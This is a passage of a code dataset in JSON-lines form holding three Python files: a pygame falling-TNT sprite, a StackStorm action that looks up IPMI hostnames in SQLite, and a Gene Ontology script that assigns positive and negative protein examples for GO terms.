"line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "collections.AirlineCollection", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "collections.AirportCollection", "line_number": 43, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "collections.RouteCollection", "line_number": 54, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pyramid.scripts.common.parse_vars", "line_number": 67, "usage_type": "call"}, {"api_name": "pyramid.paster.setup_logging", "line_number": 68, "usage_type": "call"}, {"api_name": "pyramid.paster.get_appsettings", "line_number": 69, "usage_type": "call"}, {"api_name": "airflight.collections.mongo_client_.setup", "line_number": 71, "usage_type": "call"}, {"api_name": "airflight.collections.mongo_client_", "line_number": 71, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 78, "usage_type": "call"}, {"api_name": "pymongo.errors.DuplicateKeyError", "line_number": 86, "usage_type": "name"}]} +{"seq_id": "585551849", "text": "import pygame\nfrom pygame.sprite import Sprite\nimport random\n\n\nclass TNT(Sprite):\n def __init__(self, screen):\n super().__init__()\n self.screen = screen\n self.screen_rect = screen.get_rect()\n self.image = pygame.image.load(\"tnt.jpg\")\n self.rect = self.image.get_rect()\n self.rect.centerx = random.randint(132, 1130)\n self.rect.top = self.screen_rect.top\n self.y = float(self.rect.y)\n self.speed = 0.4\n\n def update(self):\n self.y += self.speed\n self.rect.y = self.y\n\n def blitme(self):\n self.screen.blit(self.image, self.rect)\n", "sub_path": "tnt.py", "file_name": "tnt.py", "file_ext": "py", "file_size_in_byte": 619, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.sprite.Sprite", "line_number": 6, "usage_type": "name"}, {"api_name": "pygame.image.load", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 11, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "581671928", "text": "##############################################################################\n# Copyright 2018 Parker Berberian and Others #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n##############################################################################\n\nimport sqlite3\nfrom st2actions.runners.pythonrunner import Action\n\n\nclass ipmi_infoAction(Action):\n\n def run(self, host=None):\n db_file = self.action_service.get_value(name=\"database\", local=False)\n db = sqlite3.connect(db_file)\n c = db.cursor()\n ipmi_host = c.execute(\"SELECT host FROM ipmi WHERE host=?\", (host,)).fetchone()\n if ipmi_host:\n db.close()\n return host\n host_number = c.execute(\"SELECT server_number FROM hosts WHERE hostname=?\", (host,)).fetchone()[0]\n ipmi_host = c.execute(\"SELECT host FROM ipmi WHERE server_number=?\", (host_number,)).fetchone()\n db.close()\n return ipmi_host[0]\n", "sub_path": "laas/actions/actions/get_ipmi_hostname.py", "file_name": "get_ipmi_hostname.py", "file_ext": "py", "file_size_in_byte": 1871, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "st2actions.runners.pythonrunner.Action", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "562852659", "text": "#!/usr/bin/env \n\nimport os, sys\nfrom optparse import OptionParser\nfrom collections import defaultdict\nimport networkx as nx\n# See the tutorial of obonet here: \n# https://github.com/dhimmel/obonet/blob/master/examples/go-obonet.ipynb\nimport obonet\nimport pandas as pd\nfrom tqdm import tqdm\n\n\n# Guide to GO evidence codes: http://geneontology.org/page/guide-go-evidence-codes\nALL_EVIDENCE_CODES = ['EXP','IDA','IPI','IMP','IGI','IEP','ISS','ISO','ISA','ISM','IGC','IBA','IBD','IKR','IRD','RCA','TAS','NAS','IC','ND','IEA']\n\n\ndef parse_obo_file_and_build_dags(obo_file):\n \"\"\"\n Parse the GO OBO into a networkx MultiDiGraph using obonet.\n Then construct a DAG for each category using the 'is_a' relationships \n \n *returns*: a dictionary containing a DAG for each of the 3 GO categories 'C', 'F', and 'P'\n \"\"\"\n global id_to_name\n global name_to_id\n global goid_to_category # mapping from a GO term ID and the category it belongs to ('C', 'F' or 'P')\n\n print(\"Reading GO OBO file from %s\" % (obo_file))\n # obonet returns a networkx MultiDiGraph object containing all of the relationships in the ontology\n graph = obonet.read_obo(obo_file)\n # build a mapping from the GO term IDs to the name of the GO term\n id_to_name = {id_: data['name'] for id_, data in graph.nodes(data=True)}\n name_to_id = {data['name']: id_ for id_, data in graph.nodes(data=True)}\n goid_to_category = {} \n print(\"\\t%d nodes, %d edges\" % (graph.number_of_nodes(),graph.number_of_edges()))\n\n # make sure this really is a DAG\n if nx.is_directed_acyclic_graph(graph) is False:\n print(\"\\tWarning: graph is not a dag\")\n\n # copied this section from cell 19 of https://github.com/IGACAT/DataPreprocessing/blob/master/scripts/populate_go_terms.ipynb\n # Extract all edges with \"is_a\" relationship.\n # I did not include \"part_of\" relationships because the molecular_function and biological_process DAGs are not separate from each other if I do\n is_a_edge_list = []\n for child, parent, key in graph.out_edges(keys=True):\n if key == 'is_a':\n is_a_edge_list.append((child, parent))\n\n # get a is_a-type edge-induced subgraph \n is_a_subG = nx.MultiDiGraph(is_a_edge_list)\n full_to_category = {'cellular_component': 'C', 'biological_process': 'P', 'molecular_function' : 'F'}\n go_dags = {}\n # there are 3 weakly_connected_components. One for each category\n for wcc in nx.weakly_connected_components(is_a_subG):\n G = is_a_subG.subgraph(wcc)\n\n # store this DAG in the dictionary of GO DAGs\n # find the root node \n root_node = None # find root_node (no out_edge) \n for node in G.nodes():\n if G.out_degree(node) == 0:\n root_node = node\n #print(root_node, id_to_name[node])\n break\n c = full_to_category[id_to_name[root_node]]\n print(\"\\tDAG for %s has %d nodes\" % (id_to_name[root_node], len(wcc)))\n go_dags[c] = G\n\n # also set the category for each GO term\n for n in G.nodes():\n goid_to_category[n] = c\n\n return go_dags\n\n\ndef parse_gaf_file(gaf_file, pos_neg_ec=[], rem_neg_ec=[], ignore_ec=[]):\n \"\"\"\n Parse a GAF file containing direct annotations (i.e. annotations have not been propogated up the GO DAG)\n\n Calls the function setup_evidence_code_categories() to assign each evidence code \n to either the *pos_neg_ec* set, *rem_neg_ec* set, or the *ignore_ec* set. See that function\n for more description\n\n Returns:\n *prot_goids_by_c*: for each category ('C', 'F', or 'P'), \n contains the set of GO term IDs to which each protein is annotated (*pos_neg_ec* codes)\n *goid_prots*: contains the set of proteins annotated to each GO term ID (*pos_neg_ec* codes)\n *goid_rem_neg_prots*: contains the set of proteins annotated to each GO term ID (*rem_neg_ec* codes)\n *all_prots*: all proteins. Used to assign unknowns\n \"\"\"\n\n print(\"Setting up evidence code categories\")\n pos_neg_ec, rem_neg_ec, ignore_ec = setup_evidence_code_categories(pos_neg_ec, rem_neg_ec, ignore_ec)\n\n print(\"Reading annotations from GAF file %s.\" % (gaf_file))\n\n # dictionary with key: uniprotID, val: set of goterm IDs annotated to the protein\n # split by hierarchy/category so we can just pass a given categories's annotations when defining negatives\n prot_goids_by_c = {\"C\": defaultdict(set), \"F\": defaultdict(set), \"P\": defaultdict(set)}\n # dictionary with key: goterm ID, val: set of proteins annotated to the goterm ID \n goid_prots = defaultdict(set)\n goid_rem_neg_prots = defaultdict(set)\n all_prots = set()\n num_not_ann = 0\n num_pos_neg_ann = 0\n num_rem_neg_ann = 0\n num_ignored_ann = 0 \n\n # if they pass in a GAF file:\n with open(gaf_file, 'r') as f:\n for line in f:\n cols = line.rstrip().split('\\t')\n prot = cols[1]\n all_prots.add(prot)\n goid = cols[4]\n evidence_code = cols[6]\n category = cols[8]\n # for now, ignore cellular component annotations\n if category == \"C\":\n continue\n # skip NOT annotations for now\n if \"NOT\" in cols[3]:\n num_not_ann += 1 \n continue\n\n if evidence_code in ignore_ec:\n num_ignored_ann += 1\n elif evidence_code in pos_neg_ec:\n num_pos_neg_ann += 1\n prot_goids_by_c[category][prot].add(goid)\n goid_prots[goid].add(prot) \n elif evidence_code in rem_neg_ec:\n num_rem_neg_ann += 1\n goid_rem_neg_prots[goid].add(prot)\n else:\n print(\"WARNING: evidence_code '%s' not recognized\" % (evidence_code))\n\n print(\"\\t%d NOT annotations ignored\" % (num_not_ann)) \n print(\"\\t%d \\\"pos_neg_ec\\\" annotations\" % (num_pos_neg_ann))\n print(\"\\t%d \\\"rem_neg_ec\\\" annotations\" % (num_rem_neg_ann))\n print(\"\\t%d \\\"ignore_ec\\\" annotations\" % (num_ignored_ann))\n print(\"\\t%d proteins have 1 or more BP annotations\" % (len(prot_goids_by_c[\"P\"])))\n print(\"\\t%d proteins have 1 or more MF annotations\" % (len(prot_goids_by_c[\"F\"])))\n\n return prot_goids_by_c, goid_prots, goid_rem_neg_prots, all_prots\n\n\ndef setup_evidence_code_categories(pos_neg_ec=[], rem_neg_ec=[], ignore_ec=[]):\n \"\"\"\n Assigns each evidence code to either the *pos_neg_ec*, *rem_neg_ec*, or the *ignore_ec* set\n *pos_neg_ec*: a list of GO evidence codes used to assign positive and negative examples.\n If none are specified, all evidence codes not in the two other categories will be put in this category by default.\n *rem_neg_ec*: a list of GO evidence codes used to remove negative examples.\n Specifically, If a protein would be labelled as a negative example for a given term \n but is annotated with a \"rem_neg\" evidence code for the term, it is instead labelled as unknown.\n If none are specified, but \"pos_neg_ec\" codes are given, \n all codes not in the other two categories will be put in this category by default.\n *ignore_ec*: a list of GO evidence codes to ignore completely when parsing the GAF file.\n If both --pos-neg-ec and --rem-neg-ec codes are given, everything else will be ignored by default.\n ND is always ignored.\n\n *returns*: *pos_neg_ec*, *rem_neg_ec*, *ignore_ec* \n \"\"\"\n # the ND annotation means there is no data available for this protein. \n # more information about the ND annotation is available here: http://geneontology.org/page/nd-no-biological-data-available\n if \"ND\" not in ignore_ec:\n print(\"\\tIngoring the evidence code 'ND' because it means there is no data available for this protein\")\n ignore_ec.append(\"ND\")\n\n # set the positive codes to all of them by default\n # use lists instead of sets here to keep the original order\n if len(pos_neg_ec) == 0:\n # don't use sets to keep the order of the codes\n pos_neg_ec = [c for c in ALL_EVIDENCE_CODES\n if c not in rem_neg_ec and\n c not in ignore_ec]\n #pos_neg_ec = set(ALL_EVIDENCE_CODES).difference(set(rem_neg_ec)) \\\n # .difference(set(ignore_ec))\n # if 1 or more positive evidence codes are given, but no non-negative codes are given,\n # set the rest of the codes to be non-negative by default\n elif len(rem_neg_ec) == 0:\n rem_neg_ec = [c for c in ALL_EVIDENCE_CODES\n if c not in pos_neg_ec and\n c not in ignore_ec]\n # if 1 or more positive and 1 or more non-negative codes are given,\n # set the rest to be ignored by default\n else:\n ignore_ec = [c for c in ALL_EVIDENCE_CODES\n if c not in pos_neg_ec and\n c not in rem_neg_ec]\n\n print()\n print(\"pos_neg_ec (used to assign positive and negative examples):\" +\n \"\\n\\t'%s'\" % (\"','\".join(pos_neg_ec))) \n print(\"rem_neg_ec (used to remove negative examples):\" +\n \"\\n\\t'%s'\" % (\"','\".join(rem_neg_ec))) \n print(\"ignore_ec (ignored completely when assigning examples):\" +\n \"\\n\\t'%s'\" % (\"','\".join(ignore_ec)))\n print()\n\n # make sure the sets are non-overlapping\n if len(set(pos_neg_ec).intersection(set(rem_neg_ec))) != 0 or \\\n len(set(pos_neg_ec).intersection(set(ignore_ec))) != 0 or \\\n len(set(rem_neg_ec).intersection(set(ignore_ec))) != 0:\n sys.stderr.write(\"ERROR: the three sets are not disjoint. \" +\n \"Please ensure the three input sets have no overlapping evidence codes.\\n\")\n sys.exit(1)\n\n return pos_neg_ec, rem_neg_ec, ignore_ec\n\n\ndef extract_high_freq_goterms(G, goids, annotated_prots, cutoff=1000):\n \"\"\"\n *G*: GO DAG (networkx DiGraph) with prot->goid edges for each protein's annotations\n returns a set of GO terms with > cutoff proteins annotated to it \n \"\"\"\n high_freq_go_terms = set() \n for goid in tqdm(goids):\n anc = nx.ancestors(G, goid)\n # the number of positive annotations for this GO term is the number of proteins that can reach this GO term ID in the gene-goid graph\n # meaning the number of proteins annotated to this term plus those annotated to an ancestral, more specific term\n if len(anc.intersection(annotated_prots)) > cutoff:\n high_freq_go_terms.add(goid) \n\n return high_freq_go_terms\n\n\ndef build_gene_goterm_graph(go_dag, goid_prots):\n \"\"\"\n For every protein, add an edge from the protein to the GO term IDs to which it's annotated\n *go_dag*: networkx DiGraph DAG containing the is_a edges in the GO DAG \n *goid_prots*: contains the set of proteins annotated to each GO term ID\n\n *returns*: the resulting gene-goterm graph (networkx DiGraph), and the graph reversed.\n \"\"\"\n\n G = nx.DiGraph()\n G.add_edges_from(go_dag.edges())\n\n # revG is a copy of the annotation graph G with the GO DAG reversed\n revG = nx.reverse(G, copy=True)\n\n # set all of the current nodes as goids\n #nx.set_node_attributes(G, 'goid', 'type')\n\n # For every GO term ID, add an edge in the graph from the proteins annotated to the GO term ID, to the GO term ID\n # This graph allows us to get all of the proteins annotated to descendants (more specific terms) of a term\n for goid in go_dag.nodes():\n for prot in goid_prots[goid]:\n # add an edge from the protein to the GO term its annotated to\n G.add_edge(prot, goid)\n revG.add_edge(prot, goid)\n\n print(\"\\t%d nodes, %d edges\" % (G.number_of_nodes(),G.number_of_edges()))\n\n return G, revG\n\n\ndef assign_pos_neg(goid, G, revG, annotated_prots, rem_negG=None):\n \"\"\"\n This function assigns the set of positive and negative proteins for a given GO term ID.\n Specifically, for the given GO term t, we define a gene/protein g as a \n - positive if g is directly annotated to t or to a descendant of t (more specific term) in the GO DAG\n - negative if g is not annotated to t or an ancestor or descendant of t in the GO DAG, but also has at least 1 other annotation\n - unknown if g is neither a positive nor a negative meaning it has no annotations, \n or is annotated to an ancestor of t (more general term) in the GO DAG\n\n Parameters:\n *goid*: GO term for which to assign positives and negatives\n *G*: GO DAG with prot->goid edges for each protein's annotations\n *revG*: reverse of G. Used to find all of the proteins annotated to descendant or less-specific GO terms \n *annotated_prots*: all proteins with at least one direct annotation (in the GO category of the given GO term). \n Used to assign negatives and get the protein nodes from G and revG\n *rem_negG*: version of the annotation graph G which contains the rem_neg_ec annotations to remove negative examples\n\n Returns:\n *positives*: the set of proteins labelled as positives\n *negatives*: the set of proteins labelled as negatives \n \"\"\"\n\n # positives are all of the proteins can reach this GO term.\n positives = set(nx.ancestors(G, goid)).intersection(annotated_prots)\n # proteins that can be reached from this term are unknowns \n unknowns = set(nx.ancestors(revG, goid)).intersection(annotated_prots)\n ## if this node is directly annotated to the term, it's a positive\n #unknowns.difference_update(positives)\n\n if rem_negG is not None:\n # if the protein is annotated to the term, or a more specific term, with a non-negative (remove negative) evidence code,\n # don't use it as a negative\n rem_negs = set(nx.ancestors(rem_negG, goid)).intersection(annotated_prots)\n unknowns.update(rem_negs)\n\n # negatives are all of the proteins with an annotation that are not an ancestor, or descendant \n negatives = annotated_prots.difference(positives) \\\n .difference(unknowns)\n\n return positives, negatives\n\n\ndef assign_all_pos_neg(high_freq_goids, G, revG, annotated_prots, all_prots, rem_negG=None, verbose=False):\n \"\"\"\n Assigns each gene as a positive/negative/unknown example for each GO term. \n\n Parameters: \n *high_freq_goids*: goids for which to get positives and negatives. Should all belong to a single category\n *G*: annotation graph\n *revG*: annotation graph with GO DAG reversed\n *annotated_prots*: all proteins with a direct annotation (in the GO category of the high_freq_goids). Used to assign negatives\n *all_prots*: all proteins. Used to assign unknowns\n *rem_negG*: version of the annotation graph G which contains the rem_neg_ec annotations to remove negative examples\n *verbose*: print the # of positives, negatives and unknowns for each GO term\n\n Returns:\n *goid_pos*: dictionary of a set of positive examples for each GO term\n *goid_neg*: dictionary of a set of negative examples for each GO term\n *goid_unk*: dictionary of a set of unknown examples for each GO term\n \"\"\"\n global id_to_name, name_to_id\n\n print(\"Getting positives and negatives for %d GO terms\" % (len(high_freq_goids)))\n\n # dictionaries containing the set of positives and negatives respectively for each GO term ID\n goid_pos = {}\n goid_neg = {}\n goid_unk = {}\n # for each GO term, get the set of positives and the set of negatives, and store them in a dictionary\n for goid in tqdm(sorted(high_freq_goids)):\n positives, negatives = assign_pos_neg(goid, G, revG, annotated_prots, rem_negG=rem_negG)\n goid_pos[goid] = positives\n goid_neg[goid] = negatives\n goid_unk[goid] = all_prots.difference(positives).difference(negatives) \n if verbose is True:\n tqdm.write(\"\\t%d positives, %d negatives, %d unknowns for %s (%s)\" % (len(positives), len(negatives), len(goid_unk[goid]), id_to_name[goid], goid))\n\n return goid_pos, goid_neg, goid_unk\n\n\ndef build_pos_neg_table(high_freq_goids, goid_pos, goid_neg, goid_unk, summary_only=False):\n \"\"\"\n Builds a table with a positive/negative/unknown (1/-1/0) assignment for each gene-GO term pair. \n Rows are the genes and columns are the given high_freq_goids (GO terms with > cutoff proteins annotated) \n\n Parameters: \n *high_freq_goids*: goids for which to get positives and negatives. Should all belong to a single category\n *goid_pos*: positive examples for each GO term\n *goid_neg*: negative examples for each GO term\n *goid_unk*: unknown examples for each GO term\n *summary_only*: build and return only the summary table\n\n Returns:\n *df*: the table as a pandas DataFrame \n *df_summary*: a table containing the # of positive, negative and unknown examples for each GO term\n \"\"\"\n global id_to_name, name_to_id, goid_to_category\n\n if summary_only is False:\n print(\"Building a table with positive/negative/unknown assignments for each protein-goterm pair\")\n # build a table with the first column being the genes, and a column for each of the terms with > cutoff annotations indicating 1/-1/0 assignment for each gene\n pos_neg_table = defaultdict(dict)\n # build a double dictionary with either 1, -1 or 0 for each GO term protein pair\n # TODO there must be a better pandas method to construct the table\n for goid in tqdm(high_freq_goids):\n for prot in goid_pos[goid]:\n pos_neg_table[goid][prot] = 1\n for prot in goid_neg[goid]:\n pos_neg_table[goid][prot] = -1\n # unknowns are everything that is not a positive or negative\n for prot in goid_unk[goid]:\n pos_neg_table[goid][prot] = 0\n\n df = pd.DataFrame(pos_neg_table)\n\n df_summary = pd.DataFrame({\n \"GO term name\": {goid: id_to_name[goid] for goid in high_freq_goids},\n \"GO category\": {goid: goid_to_category[goid] for goid in high_freq_goids},\n \"# positive examples\": {goid: len(pos) for goid, pos in goid_pos.items()}, \n \"# negative examples\": {goid: len(neg) for goid, neg in goid_neg.items()}, \n \"# unknown examples\": {goid: len(unk) for goid, unk in goid_unk.items()}\n })\n # set the order of the columns\n cols = [\"GO term name\", \"GO category\", \"# positive examples\", \"# negative examples\", \"# unknown examples\"]\n df_summary = df_summary[cols] \n df_summary.index.rename(\"GO term\", inplace=True)\n\n if summary_only is False:\n return df, df_summary\n else:\n return df_summary\n\n\ndef main(obo_file, gaf_file, out_pref, cutoff=1000, write_table=False,\n pos_neg_ec=[], rem_neg_ec=[], ignore_ec=[]):\n # first parse the gaf and obo files\n direct_prot_goids_by_c, direct_goid_prots, direct_goid_rem_neg_prots, all_prots = parse_gaf_file(\n gaf_file, pos_neg_ec, rem_neg_ec, ignore_ec)\n go_dags = parse_obo_file_and_build_dags(obo_file)\n\n # keep track of the summary stats for each category, and combine them into one table in the end\n df_summaries = pd.DataFrame()\n\n # assign the positives, negatives and unknowns for biological process and molecular function\n for c in [\"P\", \"F\"]:\n print(\"Category: %s\" % (c))\n print(\"Building the gene-goterm graph\")\n G, revG = build_gene_goterm_graph(go_dags[c], direct_goid_prots)\n rem_negG = None\n if len(direct_goid_rem_neg_prots) > 0:\n # the remove-negative annotations also need to be be propagated, so build an annotation graph for them here\n rem_negG, rem_neg_revG = build_gene_goterm_graph(go_dags[c], direct_goid_rem_neg_prots)\n #print(\"# of prots with at least 1 %s annotation: %d\" % (c, len(prot_goids)))\n #print(\"# of %s GO terms with at 1 protein annotated to it: %d\" % (c, len(goid_prots)))\n\n print(\"Extracting GO terms with > %d annotations\" % (cutoff))\n annotated_prots = set(direct_prot_goids_by_c[c].keys())\n high_freq_goids = extract_high_freq_goterms(G, go_dags[c].nodes(), annotated_prots, cutoff=cutoff)\n # also remove biological process, cellular component and molecular function\n high_freq_goids.difference_update(set([name_to_id[name] for name in [\"cellular_component\", \"biological_process\", \"molecular_function\"]]))\n print(\"\\t%d (out of %d) GO terms have > %d proteins annotated to them\" % (len(high_freq_goids), go_dags[c].number_of_nodes(), cutoff))\n\n # keep track of the set of proteins with at least 1 annotation in this category to assign negatives later\n goid_pos, goid_neg, goid_unk = assign_all_pos_neg(high_freq_goids, G, revG, annotated_prots, all_prots, rem_negG=rem_negG)\n\n # now write it to a file\n category = {\"C\": \"cc\", \"P\": \"bp\", \"F\": \"mf\"}\n if write_table is True:\n # build a table containing a positive/negative/unknown assignment for each protein-goterm pair\n df, df_summary = build_pos_neg_table(high_freq_goids, goid_pos, goid_neg, goid_unk)\n # combine the summary stats for all categories into one table\n df_summaries = pd.concat([df_summaries, df_summary])\n\n out_file = \"%spos-neg-%s-%d.tsv\" % (out_pref, category[c], cutoff)\n print(\"Writing table containing positive/negative/unknown assignments to %s\" % (out_file))\n df.to_csv(out_file, sep=\"\\t\")\n else:\n # build a summary table of the pos/neg/unk assignments\n df_summary = build_pos_neg_table(high_freq_goids, goid_pos, goid_neg, goid_unk, summary_only=True)\n # combine the summary stats for all categories into one table\n df_summaries = pd.concat([df_summaries, df_summary])\n out_file = \"%spos-neg-%s-%d-list.tsv\" % (out_pref, category[c], cutoff)\n print(\"Writing file containing positive/negative assignments to %s\" % (out_file))\n with open(out_file, 'w') as out:\n out.write(\"#goid\\tpos/neg assignment\\tprots\\n\")\n for goid in high_freq_goids:\n out.write(\"%s\\t1\\t%s\\n\" % (goid, ','.join(goid_pos[goid])))\n out.write(\"%s\\t-1\\t%s\\n\" % (goid, ','.join(goid_neg[goid])))\n\n output_summary_file = \"%spos-neg-%d-summary-stats.tsv\" % (out_pref, cutoff)\n # maybe make this into an option later instead of always writing it\n #if output_summary_file is not None:\n print(\"Writing summary table of # of positive, negative and unknown examples for each GO term to: %s\" % (output_summary_file))\n df_summaries.to_csv(output_summary_file, sep='\\t')\n\n\ndef parse_args(args):\n ## Parse command line args.\n description = \"\"\"\nThis script takes the annotations in a GAF file, and the GO DAG and assigns \nevery gene as either a positive (1), negative (-1) or unknown (0) for each GO term with > cutoff annotations.\nWrites two tab-separated tables containing the assignments, one for BP and one for MF, where the rows are genes, \nand the columns are GO term IDs. Also writes a summary statistics table\n\"\"\"\n usage = '%prog [options] '\n parser = OptionParser(usage=usage, description=description)\n parser.add_option('-g', '--gaf-file', type='string',\n help=\"File containing GO annotations in GAF format. Required\")\n parser.add_option('-b', '--obo-file', type='string', \n help=\"GO OBO file which contains the GO DAG. Required\")\n #parser.add_option('-n', '--negatives', type='string', default='non-ancestral',\n # help=\"Types of negatives to generate. Options are: '%s'. Default = 'non-ancestral', See the README file for descriptions of these options.\" % (\"', '\".join(NEGATIVES_OPTIONS)))\n parser.add_option('-c', '--cutoff', type='int', default=1000,\n help=\"GO terms having > cutoff positive instances (proteins) are kept. Default=1000\")\n parser.add_option('-o', '--out-pref', type='string', \n help=\"Prefix used to write a table of positives, negatives, and unknowns for each GO category.\" +\n \"Writes an output file for BP and MF: pos-neg--P.tsv and pos-neg--F.tsv\")\n # writing the big pos/neg/unk assignment matrix is taking too long. \n # instead, write the pos/neg prots for each GO term to a file\n parser.add_option('', '--write-table', action='store_true', default=False,\n help=\"write the pos/neg/unk assignments to a table rather than the default comma-separated list of prots\")\n parser.add_option('', '--pos-neg-ec', type='string',\n help=\"Comma-separated list of evidence codes used to assign positive and negative examples. \" +\n \"If none are specified, all codes not in the two other categories \" + \n \"(--rem-neg-ec and --ignore-ec) will be used by default.\")\n parser.add_option('', '--rem-neg-ec', type='string',\n help=\"Comma-separated list of evidence codes used to remove negative examples. \" + \n \"Specifically, If a protein would be labelled as a negative example for a given term \" + \n \"but is annotated with a 'rem_neg' evidence code for the term, it is instead labelled as unknown. \" +\n \"If none are specified, but --pos-neg-ec codes are given, \" +\n \"all codes not in the other two categories will be put in this category by default.\")\n parser.add_option('', '--ignore-ec', type='string',\n help=\"Comma-separated list of evidence codes where annotations with the specified codes will be ignored when parsing the GAF file. \" +\n \"For example, specifying 'IEA' will skip all annotations with an evidence code 'IEA'. \" +\n \"If both --pos-neg-ec and --rem-neg-ec codes are given, everything else will be ignored by default.\")\n\n (opts, args) = parser.parse_args(args)\n\n if opts.gaf_file is None or opts.obo_file is None or opts.out_pref is None:\n parser.print_help()\n sys.exit(\"\\n--gaf-file (-g), --obo-file (-b), and --out-pref (-o) are required\")\n\n # make sure all of the specified codes are actually GO evidence codes\n codes = []\n for codes_option in [opts.pos_neg_ec, opts.rem_neg_ec, opts.ignore_ec]:\n if codes_option is not None:\n codes += codes_option.split(',')\n non_evidence_codes = set(codes).difference(set(ALL_EVIDENCE_CODES))\n if len(non_evidence_codes) > 0:\n sys.stderr.write(\"ERROR: the specified code(s) are not GO evidence codes: '%s'\\n\" % (\"', '\".join(non_evidence_codes)))\n sys.stderr.write(\"Accepted evidence codes: '%s'\\n\" % (\"', '\".join(ALL_EVIDENCE_CODES)))\n sys.exit(1)\n\n # check if the output prefix is writeable\n out_dir = os.path.dirname(opts.out_pref)\n if not os.path.isdir(out_dir):\n sys.stderr.write(\"ERROR: output directory %s specified by --out-pref doesn't exist\\n\" % (out_dir))\n sys.exit(1)\n\n return opts, args\n\n\nif __name__ == \"__main__\":\n print(\"Running %s\" % (' '.join(sys.argv)))\n opts, args = parse_args(sys.argv)\n pos_neg_ec = [] if opts.pos_neg_ec is None else opts.pos_neg_ec.split(',') \n rem_neg_ec = [] if opts.rem_neg_ec is None else opts.rem_neg_ec.split(',') \n ignore_ec = [] if opts.ignore_ec is None else opts.ignore_ec.split(',') \n main(opts.obo_file, opts.gaf_file, opts.out_pref, cutoff=opts.cutoff, write_table=opts.write_table,\n pos_neg_ec=pos_neg_ec, rem_neg_ec=rem_neg_ec, ignore_ec=ignore_ec)\n", "sub_path": "src/igacat/go_term_prediction_examples/go_term_prediction_examples.py", "file_name": "go_term_prediction_examples.py", "file_ext": "py", "file_size_in_byte": 27573, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "obonet.read_obo", "line_number": 31, "usage_type": "call"}, {"api_name": "networkx.is_directed_acyclic_graph", "line_number": 39, "usage_type": "call"}, {"api_name": "networkx.MultiDiGraph", "line_number": 51, "usage_type": "call"}, {"api_name": "networkx.weakly_connected_components", "line_number": 55, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 100, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 102, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 103, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 206, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 206, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 208, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 219, "usage_type": "call"}, {"api_name": "networkx.ancestors", "line_number": 220, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 238, "usage_type": "call"}, {"api_name": "networkx.reverse", "line_number": 242, "usage_type": "call"}, {"api_name": "networkx.ancestors", "line_number": 283, "usage_type": "call"}, {"api_name": "networkx.ancestors", "line_number": 285, "usage_type": "call"}, {"api_name": "networkx.ancestors", "line_number": 292, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 329, "usage_type": "call"}, {"api_name": "tqdm.tqdm.write", "line_number": 335, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 335, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 361, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 364, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 373, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 375, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 401, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 431, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 440, "usage_type": "call"}, {"api_name": "optparse.OptionParser", "line_number": 465, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 500, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 509, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 509, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 510, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 510, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 511, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 514, "usage_type": "call"}, {"api_name": "os.path", "line_number": 514, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 515, "usage_type": "call"}, {"api_name": "os.path", "line_number": 515, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 516, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 516, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 517, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 523, "usage_type": "attribute"}, {"api_name": "sys.argv", 